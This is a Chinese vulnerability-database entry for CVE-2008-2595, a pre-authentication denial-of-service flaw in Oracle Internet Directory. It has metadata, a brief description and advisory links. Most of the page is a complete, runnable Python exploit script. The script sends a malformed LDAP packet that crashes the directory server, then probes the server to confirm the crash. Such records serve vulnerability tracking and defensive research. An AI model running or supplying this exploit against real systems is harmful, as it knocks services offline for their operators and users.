Oracle Application Server Internet Direcotory 组件远程攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115714 漏洞类型
发布时间 2008-07-19 更新时间 2008-09-11
CVE编号 CVE-2008-2595 CNNVD-ID CNNVD-200807-252
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/6101
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-252
|漏洞详情
OracleDatabase是一款商业性质大型数据库系统。OracleApplicationServer9.0.4.3,10.1.2.3,10.1.4.2中的InternetDirectory组件存在未明漏洞。此漏洞具有未知的影响和远程攻击向量。
|漏洞EXP
#!/usr/bin/python

"""
Oracle Internet Directory 10.1.4 preauthentication Denial Of Service

NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.
Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one
shoot, but even when you only send one packet it will crash.

Tested: Win2000 x86, WinXP x86, Win2003 X86_64

Vulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)

Fixed: Oracle Critical Patch Update July 2008
CVEID: CVE-2008-2595
"""

import sys
import time
import socket

healthPacket = "0%\\x02\\x01\\x01c \\x04\\x00\\n\\x01\\x02\\n\\x01\\x00\\x02\\x01\\x00\\x02\\x01\\x00\\x01\\x01\\x00\\x87\\x0bobjectClass0\\x00"
packet = "\x30\x0e\x02\x01\x01\x60\x09\x30\x01\x03\x04\x02\x44\x4e\x80\x00"

def checkHealth(hostname, port):
    print "  --> Wating 5 seconds"
    time.sleep(5)
    
    print "  --> Connecting to target..."
    socket.setdefaulttimeout(5)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, port))

    try:
        print "  --> Sending 'health' packet ..."
        s.sendall(healthPacket)
        print "  --> Trying to receive something..."
        data = s.recv(1024)
    except:
        err = sys.exc_info()[1]

        if int(err[0]) == 104:
            print "[+] Exploits works!"
            return

    if data != "":
        print "[!] Server is up and running :("
    else:
        print "[?] Server doesn't answer nothing. It works?"

def oidDos(hostname, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print "[+] Connecting to ldap://%s:%d..." % (hostname, port)
        s.connect((hostname, int(port)))

        print "[+] Sending packet..."
        s.sendall(packet)
        s.close()

        print "[+] Checking OID's health..."
        checkHealth(hostname, port)
    except:
        print sys.exc_info()[1]

def usage():
    print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"
    print "Copyright (c) 2007 Joxean Koret"
    print
    print "Usage:"
    print sys.argv[0],"-h<hostname> -p<port>"
    print

def main():
    if len(sys.argv) != 3:
        usage()
        sys.exit(0)
    
    hostname = None
    port = None

    i = 0
    for param in sys.argv:
        i += 1
        
        if i == 1:
            continue
        
        if param.startswith("-h"):
            hostname = param[2:]
        elif param.startswith("-p"):
            port = int(param[2:])
        else:
            print "Unknown option '%s'" % param
            usage()
            sys.exit(1)
    
    if not hostname or not port:
        print "Bad command line."
        usage()
        sys.exit(1)

    oidDos(hostname, port)

if __name__ == "__main__":
    main()

# milw0rm.com [2008-07-19]
|参考资料

来源:www.oracle.com
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
来源:SECTRACK
名称:1020494
链接:http://www.securitytracker.com/id?1020494
来源:MILW0RM
名称:6101
链接:http://www.milw0rm.com/exploits/6101
来源:VUPEN
名称:ADV-2008-2115
链接:http://www.frsirt.com/english/advisories/2008/2115
来源:VUPEN
名称:ADV-2008-2109
链接:http://www.frsirt.com/english/advisories/2008/2109/references
来源:SECUNIA
名称:31113
链接:http://secunia.com/advisories/31113
来源:SECUNIA
名称:31087
链接:http://secunia.com/advisories/31087
来源:IDEFENSE
名称:20080715OracleInternetDirectoryPre-AuthenticationLDAPDoSVulnerability
链接:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=725
来源:HP
名称:HPSBMA02133
链接:http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00727143
来源:HP
名称:HPSBMA02133
链接:http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00727143